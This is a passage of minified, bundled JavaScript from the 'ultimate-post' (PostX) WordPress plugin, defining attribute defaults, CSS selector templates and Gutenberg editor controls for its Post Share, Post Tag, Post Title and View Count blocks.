o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},shareColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item-icon svg { color:{{shareColor}}; }\n      {{ULTP}}  .ultp-post-share-item-label { color:{{shareColor}} }"}]},shareCommonBg:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item a { background-color: {{shareCommonBg}}; }"}]},shareHoverColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item:hover .ultp-post-share-item-icon svg { color:{{shareHoverColor}}; }\n        {{ULTP}} .ultp-post-share-item:hover .ultp-post-share-item-label{ color:{{shareHoverColor}} }"}]},shareHoverBg:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-post-share-item a:hover { background-color:{{shareHoverBg}}; } "}]},repetableField:{type:"array",fields:{type:{type:"string",default:"facebook"},enableLabel:{type:"boolean",default:!0},label:{type:"string",default:"Share"},iconColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item a .ultp-post-share-item-icon svg { color:{{iconColor}} !important; }\n              {{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item .ultp-post-share-item-label { color:{{iconColor}} }"}]},iconColorHover:{type:"string",default:"#d2d2d2",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item:hover .ultp-post-share-item-icon svg { color:{{iconColorHover}} !important; }\n              {{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item:hover .ultp-post-share-item-label{ color:{{iconColorHover}} }"}]},shareBg:{type:"string",default:"#7a49ff",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item a { background-color: {{shareBg}}; }"}]},shareBgHover:{type:"object",default:"#7a49ff",style:[{selector:"{{ULTP}} {{REPEAT_CLASS}}.ultp-post-share-item a:hover { background-color:{{shareBgHover}}; }"}]}},default:[{type:"facebook",enableLabel:!0,label:"Facebook",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#4267B2",bgHoverColor:"#f5f5f5"},{type:"twitter",enableLabel:!0,label:"Twitter",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#1DA1F2",bgHoverColor:"#f5f5f5"},{type:"pinterest",enableLabel:!0,label:"Pinterest",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#E60023",bgHoverColor:"#f5f5f5"},{type:"linkedin",enableLabel:!0,label:"Linkedin",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#0A66C2",bgHoverColor:"#f5f5f5"},{type:"mail",enableLabel:!0,label:"Mail",iconColor:"#fff",iconColorHover:"#d2d2d2",shareBg:"#EA4335",bgHoverColor:"#f5f5f5"}]},disInline:{type:"boolean",default:!0},shareItemTypo:{type:"object",default:{openTypography:1,size:{lg:"18",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} .ultp-post-share-item a .ultp-post-share-item-label"}]},shareIconSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-share-item .ultp-post-share-item-icon svg { height:{{shareIconSize}} !important; width:{{shareIconSize}} !important;}"}]},shareBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#c3c3c3",type:"solid"},style:[{selector:"{{ULTP}} .ultp-post-share-item a"}]},shareRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-share-item a { border-radius:{{shareRadius}}; }"}]},itemPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"15",right:"15",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-share-item-inner-block .ultp-post-share-item a { padding:{{itemPadding}} !important; }"}]},itemSpacing:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-share-item-inner-block .ultp-post-share-item {margin:{{itemSpacing}} !important; }"}]},itemContentAlign:{type:"string",default:"flex-start",style:[{depends:[{key:"disInline",condition:"==",value:!0},{key:"enableSticky",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-post-share-layout {display: flex; align-items: center; justify-content:{{itemContentAlign}}; width: 100%;} "},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-post-share-layout {display: flex; justify-content: center; align-items:{{itemContentAlign}}; width: 100%;} "}]},itemAlign:{type:"string",default:"left",style:[{depends:[{key:"disInline",condition:"==",value:!1},{key:"enableSticky",condition:"==",value:!1},{key:"itemAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-post-share { text-align:{{itemAlign}}; } .rtl\n        {{ULTP}} .ultp-post-share { text-align: right !important; }"},{depends:[{key:"disInline",condition:"==",value:!1},{key:"enableSticky",condition:"==",value:!1},{key:"itemAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-post-share { text-align:{{itemAlign}}; } .rtl\n        {{ULTP}} .ultp-post-share { text-align: left !important;}"},{depends:[{key:"disInline",condition:"==",value:!1},{key:"enableSticky",condition:"==",value:!1},{key:"itemAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-post-share { text-align:{{itemAlign}}; }"}]},shareLabelShow:{type:"boolean",default:!0},labelIconSize:{type:"object",default:{lg:"24"},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-icon-section svg { height: {{labelIconSize}}px; width: {{labelIconSize}}px; }"}]},labelIconSpace:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"15",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-share-count-section { margin:{{labelIconSpace}} }"}]},shareLabelIconColor:{type:"string",default:"#002dff",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-post-share-icon-section svg{ color:{{shareLabelIconColor}}; }"}]},shareLabelStyle:{type:"string",default:"style1",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-post-share-layout{display: flex; align-items:center;}"},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-post-share-layout{display: flex; align-items:center;}"},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout{display: flex; flex-direction: column}"},{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-post-share-layout{display: flex}"}]},shareCountShow:{type:"boolean",default:!0,style:[{depends:[{key:"shareLabelStyle",condition:"==",value:"style1"},{key:"shareLabelShow",condition:"==",value:!0}]},{depends:[{key:"shareLabelStyle",condition:"==",value:"style3"},{key:"shareLabelShow",condition:"==",value:!0}]},{depends:[{key:"shareLabelStyle",condition:"==",value:"style4"},{key:"shareLabelShow",condition:"==",value:!0}]}]},Labels1BorderColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-post-share-count-section-style1,\n          {{ULTP}} .ultp-post-share-count-section-style1:after {border-color:{{Labels1BorderColor}} !important; }"}]},shareCountColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"shareLabelStyle",condition:"==",value:"style1"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count {color:{{shareCountColor}} !important; }"},{depends:[{key:"shareLabelStyle",condition:"==",value:"style3"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count {color:{{shareCountColor}} !important; }"}]},shareCountTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"shareLabelStyle",condition:"==",value:"style1"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count"},{depends:[{key:"shareLabelStyle",condition:"==",value:"style3"},{key:"shareCountShow",condition:"==",value:!0},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count"}]},shareCountLabel:{type:"string",default:"Shares",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"!=",value:"style2"}]}]},shareLabelColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"shareLabelStyle",condition:"!=",value:"style2"},{key:"shareCountLabel",condition:"!=",value:""},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section .ultp-post-share-label {color:{{shareLabelColor}}; }"}]},shareLabelTypo:{type:"object",default:{openTypography:0,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"shareLabelStyle",condition:"!=",value:"style2"},{key:"shareCountLabel",condition:"!=",value:""},{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-label"}]},shareLabelBackground:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section,\n          {{ULTP}} .ultp-post-share-count-section-style1::after {background-color:{{shareLabelBackground}}; }"}]},shareLabelBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#c3c3c3",type:"solid"},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0},{key:"shareLabelStyle",condition:"!=",value:"style1"}],selector:"{{ULTP}} .ultp-post-share-count-section,\n          {{ULTP}} .ultp-post-share-count-section-style1::after"}]},shareLabelRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section { border-radius:{{shareLabelRadius}}; }"}]},shareLabelPadding:{type:"object",default:{lg:{top:"10",bottom:"10",left:"25",right:"25",unit:"px"}},style:[{depends:[{key:"shareLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share-count-section { padding:{{shareLabelPadding}}; }"}]},enableSticky:{type:"boolean",default:!1,style:[{depends:[{key:"enableSticky",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-post-share-layout {display: flex; align-items:center;}"}]},itemPosition:{type:"string",default:"bottom",style:[{depends:[{key:"enableSticky",condition:"==",value:!0}]}]},stickyLeftOffset:{type:"string",default:"20",style:[{depends:[{key:"enableSticky",condition:"==",value:!0},{key:"itemPosition",condition:"!=",value:"right"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed;left:{{stickyLeftOffset}}px;}"}]},stickyRightOffset:{type:"string",default:"20",style:[{depends:[{key:"enableSticky",condition:"==",value:!0},{key:"itemPosition",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed; right:{{stickyRightOffset}}px;}"}]},stickyTopOffset:{type:"string",default:"20",style:[{depends:[{key:"enableSticky",condition:"==",value:!0},{key:"itemPosition",condition:"!=",value:"bottom"}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed;top:{{stickyTopOffset}}px;z-index:9999999;}"}]},stickyBottomOffset:{type:"string",default:"20",style:[{depends:[{key:"itemPosition",condition:"==",value:"bottom"},{key:"enableSticky",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-share .ultp-post-share-layout { position:fixed;bottom:{{stickyBottomOffset}}px; z-index:9999999;}"}]},resStickyPost:{type:"boolean",default:!1,style:[{depends:[{key:"enableSticky",condition:"==",value:!0}]}]},floatingResponsive:{type:"string",default:"600",style:[{depends:[{key:"resStickyPost",condition:"==",value:!0}],selector:"@media only screen and (max-width: {{floatingResponsive}}px) { .ultp-post-share-layout { position: unset !important; display: flex !important; justify-content: center; } .ultp-post-share-item-inner-block { display: flex !important; } .ultp-post-share-count-section-style1:after { bottom: auto !important; transform: rotate(44deg) !important; top: 40% !important; right: -8px !important; }} "}]},stopSticky:{type:"boolean",default:!1,style:[{depends:[{key:"enableSticky",condition:"==",value:!0}]}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},88111:(e,t,l)=>{"use strict";var o=l(67294),a=l(50730),i=l(69977),n=l(14980);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/share.svg",alt:"Post Share"}),attributes:i.Z,edit:a.Z,save:()=>null})},62358:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,tagLabel:v,tagLabelShow:h,tagIconShow:f,tagIconStyle:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:d,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(d,"ultimate-post/post-tag",y);const T=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",initialOpen:!0,include:[{data:{type:"alignment",key:"tagAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"tagColor",label:__("Color","ultimate-post")},{type:"color",key:"tagBgColor",label:__("Background","ultimate-post")},{type:"border",key:"tagItemBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"tagRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"tagHovColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"tagBgHovColor",label:__("Hover Background","ultimate-post")},{type:"border",key:"tagItemHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"tagHoverRadius",label:__("Hover Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"typography",key:"tagTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"tagSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Space Between Tags","ultimate-post")}},{data:{type:"dimension",key:"tagItemPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Tag Label","ultimate-post"),depend:"tagLabelShow",initialOpen:!1,include:[{data:{type:"text",key:"tagLabel",label:__("Tag Label","ultimate-post")}},{data:{type:"color",key:"labelColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"labelTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"tagLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Spacing","ultimate-post")}},{data:{type:"color",key:"labelBgColor",label:__("Background","ultimate-post")}},{data:{type:"dimension",key:"tagLabelPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{data:{type:"border",key:"tagLabelBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"tagLabelRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"tagIconShow",include:[{data:{type:"icon",key:"tagIconStyle",label:__("Select Icon","ultimate-post")}},{data:{type:"color",key:"tagIconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"color",key:"tagIconHovColor",label:__("Hover Color","ultimate-post")}},{data:{type:"range",key:"tagIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")}},{data:{type:"range",key:"tagIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-tag"},f&&a.ZP[k],(0,o.createElement)("div",{className:"tag-builder-label"},h&&v),(0,o.createElement)("div",{className:"tag-builder-content"},(0,o.createElement)("a",{href:"#"},"Dummy Tag 1"),(0,o.createElement)("a",{href:"#"},"Dummy Tag 2"),(0,o.createElement)("a",{href:"#"},"Dummy Tag 3"))))))}},56216:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},tagLabelShow:{type:"boolean",default:!0},tagIconShow:{type:"boolean",default:!0},tagColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a, {{ULTP}} .tag-builder-content {color:{{tagColor}};}"}]},tagBgColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a {background:{{tagBgColor}};}"}]},tagItemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#e2e2e2",type:"solid"},style:[{selector:"{{ULTP}} .ultp-builder-tag a"}]},tagRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-tag a { border-radius:{{tagRadius}}; }"}]},tagHovColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover { color:{{tagHovColor}}; }"}]},tagBgHovColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover {background:{{tagBgHovColor}};}"}]},tagItemHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000",type:"solid"},style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover"}]},tagHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover{ border-radius:{{tagHoverRadius}}; }"}]},tagTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} .ultp-builder-tag a"}]},tagSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-tag a:not(:last-child) {margin-right:{{tagSpace}}}"}]},tagItemPad:{type:"object",default:{lg:{top:"0",bottom:"0",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-tag a{ padding:{{tagItemPad}} }"}]},tagAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-tag { justify-content:{{tagAlign}}; }"}]},tagLabel:{type:"string",default:"Tags: ",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}]}]},labelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label {color:{{labelColor}};}"}]},labelBgColor:{type:"string",default:"",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label {background:{{labelBgColor}};}"}]},labelTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label"}]},tagLabelSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label{margin-right:{{tagLabelSpace}}}"}]},tagLabelBorder:{type:"object",default:{openBorder:0},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label"}]},tagLabelRadius:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label{ border-radius:{{tagLabelRadius}}; }"}]},tagLabelPad:{type:"object",default:{},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .tag-builder-label{ padding:{{tagLabelPad}} }"}]},tagIconStyle:{type:"string",default:"",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}]}]},tagIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg {color:{{tagIconColor}}; color:{{tagIconColor}} }"}]},tagIconHovColor:{type:"string",default:"",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg:hover {color:{{tagIconHovColor}}; color:{{tagIconHovColor}} }"}]},tagIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg {height:{{tagIconSize}}; width:{{tagIconSize}};}"}]},tagIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg {margin-right:{{tagIconSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},81213:(e,t,l)=>{"use strict";var o=l(67294),a=l(62358),i=l(56216),n=l(75832);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_tag.svg",alt:"Post Tag"}),attributes:i.Z,edit:a.Z,save:()=>null})},13484:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(66921);const{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,clientId:l,name:u,attributes:d,className:m,attributes:{blockId:g,advanceId:y,titleTag:b,currentPostId:v}}=e,h={setAttributes:t,name:u,attributes:d,clientId:l};(0,n.S)({blockId:g,clientId:l,currentPostId:v,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(d,"ultimate-post/post-title",g);const f=p({id:y||void 0,className:`ultp-block-${g} ${m}`});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Z,{store:h}),(0,a.dH)()),(0,o.createElement)("div",f,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)(a.VI,{tag:b,className:"ultp-builder-title"},"Sample Post Title"))))}},66921:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=e=>{const{store:t}=e;return(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"color",key:"titleColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"titleTypo",label:__("Typography","ultimate-post")}},{data:{type:"tag",key:"titleTag",label:__("Tag","ultimate-post")}},{data:{type:"alignment",key:"titleAlign",disableJustify:!1,responsive:!0,label:__("Alignment","ultimate-post")}}],store:t})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:t}),(0,o.createElement)(a.Mg,{pro:!0,store:t}),(0,o.createElement)(a.iv,{store:t})))}},69381:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-builder-title, .edit-post-visual-editor {{ULTP}} .ultp-builder-title {color:{{titleColor}};}"}]},titleTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-title { margin:0 } {{ULTP}} .ultp-builder-title , .edit-post-visual-editor {{ULTP}} .ultp-builder-title"}]},titleTag:{type:"string",default:"h1"},titleAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-title {text-align:{{titleAlign}};}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},31366:(e,t,l)=>{"use strict";var o=l(67294),a=l(13484),i=l(69381),n=l(96787);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_title.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},72567:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Component:u,Fragment:d}=wp.element;function m(e){const{setAttributes:t,name:l,attributes:u,clientId:m,className:g,attributes:{blockId:y,advanceId:b,viewLabelText:v,viewIconStyle:h,viewLabel:f,viewIconShow:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:u,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(u,"ultimate-post/post-view-count",y);const T=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(d,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"toggle",key:"viewLabel",label:__("Enable Prefix","ultimate-post")}},{data:{type:"color",key:"viewIconColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"viewTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"viewCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}},{data:{type:"text",key:"viewLabelText",label:__("Text","ultimate-post")}},{data:{type:"group",key:"viewLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"viewIconShow",include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"viewIconStyle",label:__("Style","ultimate-post")}},{data:{type:"range",key:"viewIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"viewSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-view-count"},k&&""!=h&&a.ZP[h],(0,o.createElement)("span",{className:"ultp-view-count-number"},"12 "),f&&(0,o.createElement)("span",{className:"ultp-view-label"},v)))))}},52141:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},viewLabel:{type:"boolean",default:!0},viewIconShow:{type:"boolean",default:!0},viewTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-view-count > span"}]},viewCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{viewCountAlign}};}"}]},viewLabelText:{type:"string",default:"View",style:[{depends:[{key:"viewLabel",condition:"==",value:!0}]}]},viewLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"viewLabelAlign",condition:"==",value:"before"},{key:"viewLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count .ultp-view-label {order: -1;margin-right: 5px;}"},{depends:[{key:"viewLabelAlign",condition:"==",value:"after"},{key:"viewLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count .ultp-view-label {order: unset; margin-left: 5px;}"}]},viewIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-view-count >span{ color:{{viewIconColor}} }"}]},viewIconStyle:{type:"string",default:"viewCount1",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}]}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count > svg { color:{{iconColor}}; color:{{iconColor}};} 